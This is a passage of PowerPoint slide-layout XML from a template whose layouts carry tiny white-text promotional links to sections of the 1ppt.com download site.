              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout272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72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72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72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7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73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73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73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73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73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73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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout273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73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73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73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7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74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74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74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74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74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74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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout274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74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74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74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7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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
